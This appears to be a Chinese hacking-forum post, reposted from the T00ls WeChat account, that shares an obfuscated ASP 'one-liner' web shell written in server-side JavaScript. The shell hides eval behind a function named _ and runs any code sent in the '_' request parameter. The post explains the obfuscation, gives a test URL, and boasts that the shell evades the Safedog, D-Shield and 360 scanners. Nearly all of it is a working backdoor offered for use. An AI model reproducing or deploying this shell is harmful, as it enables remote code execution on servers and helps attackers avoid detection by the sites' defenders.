大家都造PHP千变万化,从变量,数组,赋值,运算,函数等。。。没有一样不奇葩的!所以常说PHP的木马永远杀不干净。
但是asp就悲剧了,它的脚本VBS用法很死板,不像PHP语法各种灵活和奇葩,不过别忘了asp是可以自定义脚本的,如果改成Javascript脚本来执行代码,也能像PHP木马一样奇葩
下面分享一下偶的一匹悍马
<%@LANGUAGE="javascript"%>
<%_()(_(!-''));function _(__){if(__){return Request('_')+''}else{return eval
}}
%>
代码简单说明:
第一句,声明脚本为javascript
第二句,自定义了个函数_,当传入为空时返回 eval 函数,当传入为真时返回 _ 接收的值; !-'' 是1(True)的变形 (和PHP变形一样有木有?)
代码原形:
eval(Request('_')+'') ,注意 +'' 绝对不能忽略,这是把接来的值转为串,否则不能识别;
手连测试:
test.asp?_=Response.write%20(Date()); //输出当前时间
总结:
用javascript来写asp,语法就能像php一样各种奇葩,但是注意以下几点:
1. 虽然能免杀狗,盾和360,还是有关键eval,所以对于靠关键词查杀的简单脚本和工具就报出来了
2.由于用的javscript脚本,所以用一般的客户端,如菜刀,斧头。。都连不上,有待码农开发个客户端。。。
本文始发于微信公众号(T00ls):【奇技淫巧】ASP一句话也可以奇葩
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论